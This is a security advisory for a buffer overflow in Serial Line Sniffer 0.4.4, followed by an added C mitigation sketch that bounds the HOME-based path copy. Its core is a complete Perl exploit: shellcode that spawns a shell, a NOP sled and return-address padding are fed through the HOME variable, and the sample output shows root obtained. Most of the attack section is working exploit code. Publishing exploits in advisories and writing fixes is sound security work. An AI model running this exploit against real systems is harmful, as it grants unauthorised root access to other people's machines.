Serial Line Sniffer Buffer Overflow (Exploit)
Summary
slsnif is "a serial port logging utility. It listens to the specified serial port and logs all data going through this port in both directions".
Serial Line Sniffer has been found to be vulnerable to a buffer overflow. The following exploit code can be used to test your system for the vulnerability.
Credit:
The information has been provided by Sintigan.
The original article can be found at: http://shellcoders.com/sintigan/slsnif-ploit.pl
Details
Vulnerable Systems:
* Serial Line Sniffer version 0.4.4
Exploit:
# Author: Sintigan@shellcoders.com
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#
#!/usr/bin/perl
$shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73" . "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
$buf = 288;
$ret = 0xbffff3a0;
$nop = "\x90";
$offset = -250;
if (@ARGV == 1) { $offset = $ARGV[0]; }
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$addr = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $buf; $i += 4) {
    $buffer .= $addr;
}
$ENV{'HOME'} = $buffer;
exec("/usr/local/bin/slsnif");
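
Mitigation sketch (an added example, not part of the original advisory and not slsnif source code): the exploit above delivers its 288-byte buffer through the HOME environment variable, so the fix is to bound every copy of that value. The function name build_rc_path, the rc-file name, the 256-byte buffer size and the unsafe pattern shown in the comment are all assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define RC_NAME  "/.slsnifrc"  /* assumed file name, for illustration only */
#define PATH_BUF 256           /* assumed size of the fixed path buffer */

/* Assumed unsafe pattern (the bug class, not quoted from slsnif):
 *     char path[PATH_BUF];
 *     strcpy(path, getenv("HOME"));    no length check on HOME
 *     strcat(path, RC_NAME);
 */

/* Bounded version: writes "<home>/.slsnifrc" into out.
 * Returns 0 on success; -1 with errno set when home is unset,
 * not an absolute path, or the result does not fit in the buffer. */
int build_rc_path(const char *home, char *out, size_t outlen)
{
    if (out == NULL || outlen == 0) { errno = EINVAL; return -1; }
    out[0] = '\0';
    if (home == NULL || home[0] != '/') { errno = EINVAL; return -1; }

    int n = snprintf(out, outlen, "%s%s", home, RC_NAME);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';               /* never hand back a truncated path */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[PATH_BUF];
    char long_home[289];             /* constructed: 288 bytes, as in $buf */

    memset(long_home, 'A', sizeof long_home - 1);
    long_home[0] = '/';
    long_home[sizeof long_home - 1] = '\0';

    printf("normal HOME  : %d\n", build_rc_path("/home/user", path, sizeof path));
    printf("288-byte HOME: %d\n", build_rc_path(long_home, path, sizeof path));
    return 0;
}
```

A caller would pass getenv("HOME") as the first argument and treat -1 as a reason to skip the per-user file rather than continue with a partial path.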